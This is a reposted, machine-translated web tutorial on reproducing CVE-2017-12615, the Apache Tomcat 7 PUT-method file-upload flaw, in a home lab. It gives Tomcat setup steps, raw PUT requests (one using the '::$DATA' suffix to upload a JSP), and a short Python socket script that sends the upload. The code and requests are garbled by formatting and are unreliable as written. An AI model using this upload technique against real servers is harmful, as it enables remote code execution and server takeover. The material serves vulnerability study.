Tomcat cve-2017-12615 remote Upload Vulnerability replication

Source: Internet
Author: User
Tags gz file apache tomcat cve

Vulnerability Name: cve-2017-12615-Remote Code execution vulnerability

cve-2017-12615: Remote code execution vulnerability

When Tomcat is running on the Windows operating system and the HTTP Put request method is enabled (for example, by setting the ReadOnly initialization parameter to false), an attacker would likely be able to upload a JSP file containing arbitrary code to the server through a well-constructed attack request packet , the malicious code in the JSP file will be able to be executed by the server. Cause data disclosure on the server or get server permissions.

With the above two vulnerabilities can execute arbitrary code on the user server, resulting in data leakage or gain server permissions, there is a high security risk.

Impact Range: Apache Tomcat 7.0.0-7.0.81

First download the 7.0.81 version on the Tomcat website

Download Link: http://mirrors.shuosc.org/apache/tomcat/tomcat-7/v7.0.81/bin/apache-tomcat-7.0.81.tar.gz

Build the apache-tomcat-7.0.81.tar.gz file on Linux and put it into the/usr/local/directory

Enter the bin directory in the terminal and enter the./startup.sh to open Tomcat

Subsequent access to the HTTP://192.168.149.129:8080 port provides access to the

Exploit steps

There is a Web. xml file in the/conf/directory to open the add readonly parameter with the property value false

Then send a put packet to the target server

put/123.html/http/1.1 host:192.168.149.129:8080 user-agent:mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) gecko/20101026 firefox/3.6.12dnt:1connection:closecontent-length:664<HTML><Head><title>Hack by SF</title></Head><Body>hack by sf!</Body></HTML>

The packet is a 123.html file generated at the root of the target

Here we write a script using Python.

The code is as follows

ImportSocketpoc=""; buffer= ("put/123.html/http/1.1\r\n""host:192.168.149.129:8080\r\n""user-agent:mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) gecko/20101026 firefox/3.6.12\r\n""dnt:1\r\n""connection:close\r\n""content-length:664\r\n\r\n"+POC) expl=Socket.socket (Socket.af_inet,socket. SOCK_STREAM); Expl.connect (("192.168.149.129", 8080)); Expl.send (buffer); Expl.close (); 

After running:

Modify the 123.html suffix to upload any file.

Re-attach the Tomcat 7.0.79 POC:

Put/aedoo.jsp:: $DATA http/1.1192.168.1.1:8080Cache-control:max-age=0Upgrade- Insecure-requests:1User-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/60.0.3112.113 safari/537.36accept:text/html,application/ xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-language:zh-cn,zh;q=0.8  Cookie:Connection:closeContent-length:22 your JSP ma

Tomcat cve-2017-12615 remote Upload Vulnerability replication

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.